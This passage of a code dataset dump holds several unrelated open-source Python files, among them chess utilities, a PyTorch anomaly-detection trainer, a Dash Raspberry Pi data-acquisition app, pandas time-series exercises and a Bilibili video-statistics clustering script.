max_dim)\n max_dim = max(np.abs(max([item[1] for item in points]) - cm[1]), max_dim)\n max_dim = max(np.abs(min([item[1] for item in points]) - cm[1]), max_dim)\n max_dim = max(np.abs(max([item[2] for item in points]) - cm[2]), max_dim)\n max_dim = max(np.abs(min([item[2] for item in points]) - cm[2]), max_dim)\n cube = {'x_max': cm[0] + max_dim, 'x_min': cm[0] - max_dim, 'y_max': cm[1] + max_dim, 'y_min': cm[1] - max_dim,\n 'z_max': cm[2] + max_dim, 'z_min': cm[2] - max_dim}\n return cube\n\n\ndef get_points_from_mesh(pw):\n x = [pw['par']['a'][0], pw['par']['b'][0], pw['par']['c'][0], pw['par']['d'][0]]\n y = [pw['par']['a'][1], pw['par']['b'][1], pw['par']['c'][1], pw['par']['d'][1]]\n z = [pw['par']['a'][2], pw['par']['b'][2], pw['par']['c'][2], pw['par']['d'][2]]\n return x, y, z\n","repo_name":"tkucner/3D_MDR_examples","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20911871385","text":"# util.py\n# Has some miscellaneous utilities used throughout this program\n\n# Due to how this code is written indexing a space in the board is done [number][letter] like ['1']['a'] meaning a1\n# Dictionaries used to convert between strings like 'a4' to indexes like [5][0]\nboard_to_space = {\n 'a': 0,\n 'b': 1,\n 'c': 2,\n 'd': 3,\n 'e': 4,\n 'f': 5,\n 'g': 6,\n 'h': 7,\n '1': 0,\n '2': 1,\n '3': 2,\n '4': 3,\n '5': 4,\n '6': 5,\n '7': 6,\n '8': 7\n}\ndef str_to_space(space_str):\n space = [board_to_space[space_str[1]], board_to_space[space_str[0]]]\n return space\n\ncol_to_board = {\n 0: '1',\n 1: '2',\n 2: '3',\n 3: '4',\n 4: '5',\n 5: '6',\n 6: '7',\n 7: '8',\n}\nrow_to_board = {\n 0: 'a',\n 1: 'b',\n 2: 'c',\n 3: 'd',\n 4: 'e',\n 5: 'f',\n 6: 'g',\n 7: 'h',\n}\n\n# Most of the time colors are represented by their character abbreviations\n# This dict allows us to convert back easily their names\ncolor_abr_to_name = {\n 'w': 'white',\n 'b': 'black',\n ' ': ' '\n}\n\n# Stuff used for empty spaces/pieces (changing these has not been tested)\nempty_abr = ' '\nempty_color = ' '\n\n# This was needed to create lambdas in a loop for each button in gui\n# using lambda: obj(param) in the loop led to one lambda being used for all buttons\ndef create_lambda(obj, param):\n return lambda: obj(param)\n\ndef get_lower(num1, num2):\n if num1 < num2:\n return num1\n else:\n return num2\n\n# Stops negative indexing and IndexErrors used extensively in chess_pieces\ndef has_index2D(list, index_1, index_2):\n if index_1 < 0 or index_2 < 0:\n return False\n try:\n list[index_1][index_2]\n return True\n except IndexError:\n return False\n","repo_name":"remton/Python_Chess","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"18850064389","text":"import sys\n\nsys.path.append('../../')\n\n# other imports\n\nimport torch.utils.data\n\nfrom examples.self_supervised.dataContainer import *\n#from torch.profiler import profile, record_function, ProfilerActivity\n\nclass modelBuilder():\n\n def __init__(self, input_channels, output_channels):\n self.input_channels = input_channels\n self.output_channels = output_channels\n\n def generate(self, model_name, config):\n print(\"Creating network\")\n if model_name == \"CompositeNet\":\n from networks.network_classif import MCConpositeNet as Net\n return Net(self.input_channels, 
self.output_channels, config).float()\n\n else:\n from networks.network_classif import MCConvPoint as Net\n return Net(self.input_channels, self.output_channels).float()\n\nclass Trainer():\n\n def __init__(self, dataContainer, net, config, folderName=None):\n\n self.N_LABELS = len(dataContainer.getTransformationList())\n self.labels_list = dataContainer.getTransformationList()\n self.config = config\n self.softmax = nn.Softmax(dim=1)\n config[\"n_parameters\"] = self.count_parameters(net)\n self.warm_up_n_epochs = config[\"warm_up_n_epochs\"]\n # define the save directory\n if folderName == None:\n time_string = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n folderName = \"{}_bs{:02d}_pts{}_{}\".format(config['architecture'], config['batchsize'], config['npoints'], time_string)\n # self.save_dir = os.path.join(config['savedir'], folderName)\n time_string = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n self.save_dir = os.path.join(\n folderName,\n \"Experiment_{}\".format(time_string))\n # setting stuff for trainer\n if config['cuda']:\n net.cuda()\n print(\"Number of parameters\", self.count_parameters(net))\n self.net = net\n self.train_loader, self.test_loader = dataContainer.getDataLoader(\n numPts=config['npoints'],\n threads=0,\n batchSize=config['batchsize']\n )\n\n self.rocs = []\n self.aucs = []\n\n self.test_data = dataContainer.getTestData()\n self.test_labels = dataContainer.getTestLabels()\n self.optimizer = torch.optim.Adam(net.parameters(), lr=1e-4)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, config[\"schedule\"], gamma=0.1) # gamma=0.5 [20, 35, 50, 70], gamma=0.5 ) [30, 45, 75]\n\n\n def init_logs(self):\n\n print(os.getcwd())\n os.makedirs(self.save_dir, exist_ok=True)\n logFile = open(os.path.join(self.save_dir, \"logs.txt\"), \"w\")\n configFile = open(os.path.join(self.save_dir, \"config.txt\"), \"w\")\n configFile.write(str(self.config))\n print(\"creating save folder\")\n print(logFile)\n return logFile\n\n def normality_score(self, O):\n # [N, N_T, N_T]\n diags = torch.diagonal(O, offset=0, dim1=1, dim2=2)\n means = torch.mean(diags, 1)\n return means\n\n def train(self, epoch_nbr=100):\n\n f = self.init_logs()\n for epoch in range(epoch_nbr):\n # TRAIN\n self.net.train()\n train_aloss, train_oa, train_aa = self.apply(epoch, training=True)\n # TEST\n self.net.eval()\n self.net.eval()\n if (epoch >= self.warm_up_n_epochs):\n with torch.no_grad():\n test_auc, roc, self.outputs = self.apply(epoch, training=False)\n self.rocs.append(roc)\n self.aucs.append(float(test_auc))\n # save network\n torch.save(self.net.state_dict(), os.path.join(self.save_dir, \"state_dict.pth\"))\n else:\n test_auc = \"NaN\"\n # write the logs\n f.write(str(epoch) + \",\")\n f.write(train_aloss + \",\")\n f.write(test_auc + \"\\n\")\n f.flush()\n\n self.scheduler.step()\n f.close()\n\n def apply(self, epoch, training=False):\n\n ''' Applies the function learnt by self.net over the input provided\n \t\tby train and test loaders\n\n \t\tParameters:\n \t\t-----------\n \t\tepoch : int, used for logging purposes.\n \t\ttraining : bool, if True we perform the backward pass,\n \t\t\t\t\t\t if False we compute test metrics.\n \t'''\n error = 0\n cm = np.zeros((self.N_LABELS, self.N_LABELS))\n # ___________________________________________________________\n #\n # Training phase: weights are updated, returned metrics are\n #\tonly training_loss, training_OA, training_AA.\n # ___________________________________________________________\n #\n if training:\n t = 
tqdm(self.train_loader, desc=\"Epoch \" + str(epoch), ncols=130)\n for pts, features, Rs, _ , target_transform, indices in t:\n if self.config['cuda']:\n Rs = Rs.cuda()\n features = features.cuda()\n target_transform = target_transform.cuda()\n pts = pts.cuda()\n self.optimizer.zero_grad()\n # FORWARD\n pts = torch.bmm(pts, Rs)\n outputs = self.net(features, pts)\n target_transform = target_transform.view(-1)\n # BACKWARD STEP\n loss = F.cross_entropy(outputs, target_transform)\n loss.backward()\n self.optimizer.step()\n # METRICS IN TQDM PROGRESS BAR\n predicted_class = np.argmax(outputs.cpu().detach().numpy(), axis=1)\n target_np = target_transform.cpu().numpy()\n cm_ = confusion_matrix(target_np.ravel(), predicted_class.ravel(), labels=list(range(self.N_LABELS)))\n cm += cm_\n error += loss.item()\n oa = \"{:.5f}\".format(metrics.stats_overall_accuracy(cm))\n aa = \"{:.5f}\".format(metrics.stats_accuracy_per_class(cm)[0])\n aiou = \"{:.5f}\".format(metrics.stats_iou_per_class(cm)[0])\n aloss = \"{:.5e}\".format(error / cm.sum())\n t.set_postfix(OA=oa, AA=aa, AIOU=aiou, ALoss=aloss)\n\n return aloss, oa, aa\n # ___________________________________________________________\n #\n # Testing phase: weights are not updated, returned metrics are\n #\tloss, OA, AA, AAUC, OAUC (see:\n # \thttps://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_auc_score.html\n # ___________________________________________________________\n #\n else:\n times_list = []\n anomaly_scores = np.zeros((self.test_data.shape[0]), dtype=float)\n t = tqdm(self.test_loader, desc=\" Test \" + str(epoch), ncols=100)\n for pts, features, Rs, targets, targets_transform, indices in t:\n if self.config['cuda']:\n features = features.cuda()\n Rs = Rs.cuda()\n # target_transform = targets_transform.cuda()\n pts = pts.cuda()\n # targets = targets.cuda()\n # FEEDING INPUT\n pts = torch.bmm(pts, Rs)\n outputs = self.net(features, pts)\n outputs = self.softmax(outputs)\n # [N * N_T, N_T ] --> [ N, N_T, N_T ]\n outputs = outputs.view(-1, self.N_LABELS, self.N_LABELS)\n batch_scores = - self.normality_score(outputs)\n batch_scores = batch_scores.cpu().detach().numpy()\n for i in range(0, indices.size(0), self.N_LABELS):\n\n anomaly_scores[indices[i]] += batch_scores[i // self.N_LABELS]\n\n print(self.test_labels)\n print(anomaly_scores.shape)\n auc = \"{:.4f}\".format(metrics.roc_auc_score(self.test_labels, anomaly_scores))\n print(\"Predictions\", \"AUC\", auc)\n # \"AA\", aa,\n # \"IOU\", aiou,\n # \"normAcc\", normAcc,\n # \"anomAcc\", anomAcc)\n roc_fpr, roc_tpr, roc_thr = metrics.roc_curve(self.test_labels, anomaly_scores)\n return auc, [roc_fpr, roc_tpr, roc_thr], anomaly_scores\n\n def count_parameters(self, model):\n parameters = model.parameters()\n return sum(p.numel() for p in parameters if p.requires_grad)\n","repo_name":"sirolf-otrebla/CompositeNet","sub_path":"examples/self_supervised/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":8394,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"} +{"seq_id":"72406114864","text":"import pandas as pd\nfrom Bio import SeqIO\nfile = open(snakemake.output[0],\"w\")\ndf = pd.read_csv(snakemake.input[0],sep =\",\")\nhitlist = []\norganismlist = []\nfor i in range(len(df)):\n if df.loc[i,'qseqid'] == snakemake.params[0] :\n hitlist.append(df.loc[i,'sseqid'])\n organismlist.append(df.loc[i,'Organism'])\ndico = {}\nprotein = snakemake.input[1]\nfasta_sequences = SeqIO.parse(open(protein),'fasta')\nfor fasta in 
fasta_sequences:\n name, sequence = fasta.id, str(fasta.seq)\n dico[name]=sequence\nfor i in range(len(hitlist)):\n if hitlist[i] in list(dico.keys()):\n file.write(\">\")\n file.write(hitlist[i])\n file.write(\" \")\n file.write(organismlist[i])\n file.write(\"\\n\")\n file.write(dico[hitlist[i]])\n file.write(\"\\n\")\nfile.close()\n","repo_name":"fmangane/perfom_filter_blast","sub_path":"scripts/genes_fasta_collector.py","file_name":"genes_fasta_collector.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9503229079","text":"'''\nCreated on 02.11.2011\n\n@author: michi\n'''\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QGraphicsSimpleTextItem, QTransform\n\nfrom geotiledmapobjectinfo import GeoTiledMapObjectInfo #@UnresolvedImport\n\nclass GeoTiledMapTextObjectInfo(GeoTiledMapObjectInfo):\n def __init__(self, mapData, mapObject):\n self.text = mapObject\n GeoTiledMapObjectInfo.__init__(self, mapData, mapObject)\n self.text.textChanged.connect(self.textChanged)\n self.text.fontChanged.connect(self.fontChanged)\n self.text.penChanged.connect(self.penChanged)\n self.text.brushChanged.connect(self.brushChanged)\n self.text.offsetChanged.connect(self.offsetChanged)\n self.text.alignmentChanged.connect(self.alignmentChanged)\n \n self.textItem = QGraphicsSimpleTextItem()\n self.graphicsItem = self.textItem\n \n self.penChanged(self.text.pen())\n self.brushChanged(self.text.brush())\n self.originChanged(self.text.origin())\n self.fontChanged(self.text.font())\n self.textChanged(self.text.text())\n \n def textChanged(self, text):\n self.textItem.setText(self.text.text())\n self._doAlignment()\n self.updateItem()\n \n def fontChanged(self, font):\n self.textItem.setFont(self.text.font())\n self._doAlignment()\n self.updateItem()\n \n def offsetChanged(self, offset):\n self._doAlignment()\n self.updateItem()\n \n def alignmentChanged(self, alignment):\n self._doAlignment()\n self.updateItem()\n \n def penChanged(self, pen):\n self.textItem.setPen(self.text.pen())\n self._doAlignment()\n self.updateItem()\n \n def brushChanged(self, brush):\n if self.textItem:\n self.textItem.setBrush(self.text.brush())\n self._doAlignment()\n self.updateItem()\n \n def _doAlignment(self):\n align = self.text.alignment()\n trans = QTransform()\n self.textItem.setTransform(trans)\n \n rect = self.textItem.boundingRect()\n center = rect.center()\n \n if align & Qt.AlignVCenter:\n trans.translate(0, -1 * center.y())\n elif align & Qt.AlignTop:\n trans.translate(0, -1 * rect.top())\n elif align & Qt.AlignBottom:\n trans.translate(0, -1 * rect.bottom())\n \n if align & Qt.AlignHCenter:\n trans.translate(-1 * center.x(), 0)\n elif align & Qt.AlignLeft:\n trans.translate(-1 * rect.left(), 0)\n elif align & Qt.AlignRight:\n trans.translate(-1 * rect.right(), 0)\n \n offset = self.text.offset()\n trans.translate(offset.x(), offset.y())\n self.textItem.setTransform(trans)","repo_name":"mtils/ems","sub_path":"ems/qt4/location/maps/tiled/geotiledmaptextobjectinfo.py","file_name":"geotiledmaptextobjectinfo.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"13747513684","text":"import logging\n\n\nlogger = logging.getLogger(\"app\")\nch = None\n\nclass CustomFormatter(logging.Formatter):\n '''Logging Formatter to add colors and count warning / errors'''\n\n grey = '\\x1b[38;5m'\n yellow = '\\x1b[33;21m'\n red = 
'\\x1b[31;21m'\n bold_red = '\\x1b[31;1m'\n reset = '\\x1b[0m'\n format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)'\n\n FORMATS = {\n logging.DEBUG: grey + format + reset,\n logging.INFO: grey + format + reset,\n logging.WARNING: yellow + format + reset,\n logging.ERROR: red + format + reset,\n logging.CRITICAL: bold_red + format + reset\n }\n\n def format(self, record):\n log_fmt = self.FORMATS.get(record.levelno)\n _formatter = logging.Formatter(log_fmt)\n return _formatter.format(record)\n\n\ndef remove_logger():\n logger.removeHandler(ch)\n\n\ndef init_logger(mode=\"debug\") -> logging.Logger:\n logging_levels = {\n \"debug\": logging.DEBUG,\n \"info\": logging.INFO,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n \"critical\": logging.critical\n }\n\n try:\n logger.setLevel(logging_levels[mode])\n\n except KeyError:\n logger.setLevel(logging_levels['debug'])\n print(\"logger mode not available, using debug mode\")\n \n def setup_logger(file_name, level):\n # file output\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)')\n fh = logging.FileHandler(file_name)\n fh.setLevel(level)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # create console handler with a higher log level\n global ch\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(CustomFormatter())\n\n logger.addHandler(ch)\n\n setup_logger('app.log', logging.DEBUG)\n setup_logger('app.warning.log', logging.WARNING)\n setup_logger('app.error.log', logging.ERROR)\n\n return logger\n\n\ndef clear_logs():\n logs = ['app.log', 'app.warning.log', 'app.error.log']\n for log in logs:\n with open(log, 'w'):\n pass\n","repo_name":"Seaofbbs/BlendArMocap","sub_path":"src/cgt_utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"} +{"seq_id":"17110247800","text":"#!/home/pi/MyDAQApp/daq/bin/python3\n\nimport Adafruit_ADS1x15\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport time\nimport dash_daq as daq\nfrom collections import deque\nimport plotly.graph_objs as go\nimport random\nimport plotly.graph_objects as go\nimport RPi.GPIO as GPIO\nfrom thermocouple import temp_data\nfrom Accelerometer import accelerometer_values\nfrom variables import *\nfrom components_layout import *\nfrom update_readings import *\n\npinList = [4,17,18,27,22,23,24,10]\n\nGPIO.setmode(GPIO.BCM)\n\nfor i in pinList:\n GPIO.setup(i, GPIO.OUT)\n GPIO.output(i, GPIO.LOW)\n\n@app.callback(dash.dependencies.Output('page-content', 'children'),\n [dash.dependencies.Input('url', 'pathname')])\ndef display_page(pathname):\n if pathname == '/page-1':\n return page_1_layout\n elif pathname == '/page-2':\n return page_2_layout\n elif pathname == '/page-3':\n return page_3_layout\n elif pathname == '/page-4':\n return page_4_layout\n elif pathname == '/page-5':\n return page_5_layout\n elif pathname == '/page-6':\n return page_6_layout\n elif pathname == '/page-7':\n return page_7_layout\n else:\n return index_page\n\n\n\n@app.callback(\n dash.dependencies.Output('graphop1','children'),\n [dash.dependencies.Input('dropdownlist1', 'value'), dash.dependencies.Input('graph-update', 'interval')]\n )\ndef update_graph(data_names, n):\n graphs = []\n list_value = []\n \n update_thermocouple_values(times, thermocouple_1, thermocouple_2, thermocouple_3, thermocouple_4, thermocouple_5, 
thermocouple_6, thermocouple_7, thermocouple_8)\n if len(data_names)>2:\n class_choice = 'col s12 m6 l4'\n elif len(data_names) == 2:\n class_choice = 'col s12 m6 l6'\n else:\n class_choice = 'col s12'\n\n\n for data_name in data_names:\n\n data = go.Scatter(\n x=list(times),\n y=list(data_thermocouple[data_name]),\n name='Scatter',\n fill=\"tozeroy\",\n fillcolor=\"#6897bb\"\n )\n\n graphs.append(html.Div(dcc.Graph(\n id=data_name,\n animate=True,\n figure={'data': [data],'layout' : go.Layout(xaxis=dict(range=[min(times),max(times)]),\n yaxis=dict(range=[min(data_thermocouple[data_name]),max(data_thermocouple[data_name])]),\n margin={'l':50,'r':1,'t':45,'b':70},\n title='{}'.format(data_name))}\n ), className=class_choice))\n\n return graphs\n\n\n@app.callback(\n dash.dependencies.Output('x-gauge','value'),\n [dash.dependencies.Input('stream', 'n_intervals')]\n )\ndef stream(conn):\n if conn:\n x, y, z = accelerometer_values()\n return x\n\n@app.callback(\n dash.dependencies.Output('y-gauge','value'),\n [dash.dependencies.Input('stream', 'n_intervals')]\n )\ndef stream(conn):\n if conn:\n x, y, z = accelerometer_values()\n return y\n\n@app.callback(\n dash.dependencies.Output('z-gauge','value'),\n [dash.dependencies.Input('stream', 'n_intervals')]\n )\ndef stream(conn):\n if conn:\n x, y, z = accelerometer_values()\n return z\n\n@app.callback(\n dash.dependencies.Output('led1','value'),\n [dash.dependencies.Input('updateled', 'n_intervals')]\n )\ndef update_led(conn):\n if conn:\n print(temp_data()[0])\n return (temp_data()[0])\n\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-1', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-1', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(4, GPIO.HIGH)\n else:\n GPIO.output(4, GPIO.LOW)\n \n \n return 'The switch is {}.'.format(on)\n\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-2', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-2', 'on')])\n\ndef update_output(on):\n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-3', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-3', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(17, GPIO.HIGH)\n else:\n GPIO.output(17, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-4', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-4', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(18, GPIO.HIGH)\n else:\n GPIO.output(18, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-5', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-5', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(27, GPIO.HIGH)\n else:\n GPIO.output(27, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-6', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-6', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(22, GPIO.HIGH)\n else:\n GPIO.output(22, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-7', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-7', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(23, GPIO.HIGH)\n else:\n GPIO.output(23, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n 
dash.dependencies.Output('toggle-switch-output-8', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-8', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(24, GPIO.HIGH)\n else:\n GPIO.output(24, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n \nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"kevinthakar/daq-dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"19219823803","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime\nfrom pandas.tseries.offsets import *\nfrom pandas.tseries.holiday import *\n\n# dti = pd.date_range('2014-08-29', '2014-09-05', freq='B')\n# print(dti.values)\n# print(dti.freq)\n\n# days = pd.date_range(\n# '2014-08-29', '2014-09-05', freq='B'\n# )\n# d = datetime.datetime(2014, 8, 29)\n# do = pd.DateOffset(days=1)\n# print(d + do)\n# print(d+BusinessDay())\n# print(d+2*BusinessDay())\n# print(d+BMonthEnd())\n#\n# print(BMonthEnd().rollforward(datetime.datetime(2014, 9, 15)))\n#\n# print(d - Week(weekday=1))\n\n# qends = pd.date_range(\n# '2014-01-01', '2014-12-31', freq='BQS-JUN'\n# )\n# print(qends.values)\n\n\n# aug = pd.Period('2014-08', freq='M')\n# print(aug)\n# print(aug.start_time, aug.end_time)\n# sep = aug+1\n# print(sep)\n\n# mp2013 = pd.period_range(\n# '1/1/2013',\n# '12/31/2013',\n# freq='M'\n# )\n# print(mp2013)\n\n# for p in mp2013:\n# print(\"{0} {1}\".format(p.start_time, p.end_time))\n\n\n# US FederalCalendar\n# cal = USFederalHolidayCalendar()\n# for d in cal.holidays(start='2014-01-01', end='2014-12-31'):\n# print(d)\n\n# Custom businessDay\n# cbd = CustomBusinessDay(holidays=cal.holidays())\n# print(datetime(2014, 8, 29) + cbd)\n\n\ncount = 24*60*60*5\nnp.random.seed(123456)\nvalues = np.random.randn(count)\nws = pd.Series(values)\nwalk = ws.cumsum()\nwalk.index = pd.date_range(\n '2014-08-01',\n periods=count,\n freq=\"S\"\n)\n# print(walk)\n# print(walk.resample(\"1Min\").mean())\n# print(walk['2014-08-01 00:00'].mean())\n# print(walk.resample(\"1Min\", closed='right').mean())\n\n# first_minute = walk['2014-08-01 00:00']\n# means = first_minute.rolling(\n# window=5,\n# center=False\n# ).mean()\n# means.plot()\n# plt.show()\n\nhlw = walk['2014-08-01 00:00']\nmeans2 = hlw.rolling(\n window=2, center=False\n).mean()\nmeans3 = hlw.rolling(\n window=5, center=False\n).mean()\nmeans4 = hlw.rolling(\n window=10, center=False\n).mean()\n\nhlw.plot()\nmeans2.plot()\nmeans3.plot()\nmeans4.plot()\nplt.show()\n","repo_name":"ejaj/pandas","sub_path":"time-series.py","file_name":"time-series.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"27538907122","text":"from .misc import *\r\n__all__ = [\r\n \"_tools\",\r\n \"_geometry\",\r\n \"_signal_processing\",\r\n \"_video_io\",\r\n \"__groups\",\r\n \"toString\",\r\n \"toArray\",\r\n \"toBytes\",\r\n \"toCharP\",\r\n \"createZeroArrayHandle\",\r\n \"loadDlls\",\r\n]\r\n\r\n\r\n# from ..geometry.rir_geometry import (\r\n# polygon_interpolate,\r\n# rdp_simplify_polygon,\r\n# rdp_simplify_polygon2,\r\n# draw_polygon,\r\n# extract_polygon,\r\n# extract_convex_hull,\r\n# minimum_area_bbox,\r\n# )\r\n\r\n# from ..tools.rir_tools import zstd_decompress, zstd_compress\r\n\r\n# __all__ = [\r\n# \"zstd_decompress\",\r\n# \"zstd_compress\",\r\n# \"polygon_interpolate\",\r\n# 
\"rdp_simplify_polygon\",\r\n# \"rdp_simplify_polygon2\",\r\n# \"draw_polygon\",\r\n# \"extract_polygon\",\r\n# \"extract_convex_hull\",\r\n# \"minimum_area_bbox\",\r\n# ]\r\n\r\n\r\n","repo_name":"IRFM/librir","sub_path":"src/python/librir/low_level/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"} +{"seq_id":"13358173927","text":"import pandas as pd\nfrom pyecharts import options as opts\nfrom pyecharts.charts import *\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom common import utils\n\n# %%\nfile_path = r'数据分析项目/database/bilibili2019-1_2020-3.csv'\ndf = pd.read_csv(file_path)\n\n# %%\nprint(utils.show_na(df))\nprint(utils.show_info(df))\nprint(utils.show_duplicated(df))\n\n# %%\n\"\"\"\nIFL模型\nI(Interaction_rate):\nI值反映的是平均每个视频的互动率,互动率越高,表明其视频更能产生用户的共鸣,使其有话题感。\n**I=(总弹幕数+总评论数)/总播放量/统计范围内视频数量\nF(Frequence):\nF值表示的是每个视频的平均发布周期,每个视频之间的发布周期越短,说明内容生产者创作视频的时间也就越短,创作时间太长,\n不是忠实粉丝的用户可能将其遗忘。\n**F=(统计范围内最晚发布视频时间-最早发布视频时间)/发布视频的数量\nL(Like_rate):\nL值表示的是统计时间内发布视频的平均点赞率,越大表示视频质量越稳定,用户对up主的认可度也就越高。\n**L=(点赞数X1+投币数X2+收藏数X3+分享数X4)/播放量X发布视频数\n\"\"\"\n\n# %%\ndf.drop_duplicates(inplace=True) # 去重\ndf.dropna(inplace=True) # 删除缺失值记录\ndf.reset_index(drop=True, inplace=True) # 重置index\ndf.sort_values('view', ascending=False, inplace=True) # 按播放量由高到低排序\ndf.reset_index(drop=True, inplace=True) # 重置index\ndf['date'] = pd.to_datetime(df['date'])\n# %%\n# B站播放量top10视频\nvideo_top10 = df.groupby(['title', 'bv'])['view'].sum().reset_index()\nvideo_top10.sort_values('view', ascending=False, inplace=True)\nvideo_top10 = video_top10.iloc[:10, :]\nvideo_top10.sort_values('view', ascending=True, inplace=True)\n# %%\nbar = (\n Bar()\n .add_xaxis(video_top10['title'].to_list())\n .add_yaxis('播放量', video_top10['view'].to_list())\n .set_global_opts(title_opts=opts.TitleOpts('B站播放前10视频'))\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .reversal_axis()\n)\nbar.render()\n\n# %%\n# B站硬笔数量top10 up主\ncoins_top10 = df.groupby(['author'])['coins'].sum().reset_index()\ncoins_top10.sort_values('coins', ascending=False, inplace=True)\ncoins_top10 = coins_top10.iloc[:10, :]\ncoins_top10.sort_values('coins', ascending=True, inplace=True)\nbar = (\n Bar()\n .add_xaxis(coins_top10['author'].to_list())\n .add_yaxis('硬币数', coins_top10['coins'].to_list())\n .set_global_opts(title_opts=opts.TitleOpts('B站硬币数量top10 up'))\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .reversal_axis()\n)\nbar.render()\n\n# %%\n# 四、构建特征值\n# I:\n# 视频数\nvideo_count = df.groupby('author')['bv'].count()\n# 过滤掉视频数不足5个的记录\ndata = df[~df['author'].isin(video_count[video_count.values < 5].index)].reset_index(drop=True)\n# 弹幕数\nbullet_screen_sum = data.groupby('author')['danmu'].sum()\n# 转发数\ncomments = data.groupby('author')['replay'].sum()\n# 观看数\nview = data.groupby('author')['view'].sum()\n# 视频数(<5个的)\nvideo_count = data.groupby('author')['bv'].count()\nI = round(((bullet_screen_sum + comments) / view / video_count * 100), 2).reset_index(name='I')\n\n# 4.2 构造F值\nlatest_date = data.groupby('author')['date'].max().dt.date\nearliest_date = data.groupby('author')['date'].min().dt.date\ndiff = (latest_date - earliest_date).dt.days\nF = (diff / video_count).reset_index(name='F')\n\n# 构造L值\n\ndata['L'] = (data['likes'] * 1 + data['coins'] * 2 + data['favorite'] * 3 + data['share'] * 4) / data['view']\nL = 
(data.groupby('author')['L'].sum() / video_count).reset_index(name='L')\n\n# 合并I,F,L指标\nIFL = pd.merge(I, F, how='outer', left_index=True, right_index=True)\nIFL = IFL.merge(L, how='outer', left_index=True, right_index=True)\nIFL.drop(columns=['author_x', 'author_y'], inplace=True)\nIFL = IFL.iloc[:, [2, 0, 1, 3]]\nIFL.set_index('author', inplace=True)\nmodel_scaler = MinMaxScaler()\ndate_scaler = model_scaler.fit_transform(IFL.iloc[:, 1:4])\n\n# 使用K-Means聚类方法\nscore_list = []\nsilhouette_init = -1\nfor n_cluster in range(2, 10):\n model_kmeans = KMeans(n_clusters=n_cluster) # 建立聚类模型对象\n label_temp = model_kmeans.fit_predict(date_scaler)\n silhouette_temp = silhouette_score(date_scaler, label_temp) # 得到每个k下的平均轮廓系数\n if silhouette_temp > silhouette_init: # 如果平均轮廓系数更高\n best_k = n_cluster # 保存最佳k值\n silhouette_init = silhouette_temp # 替换为下一轮的对照平均轮廓系数\n best_model = model_kmeans # 保存模型示例对象\n cluster_labels_k = label_temp # 保存聚类标签\n score_list.append([n_cluster, 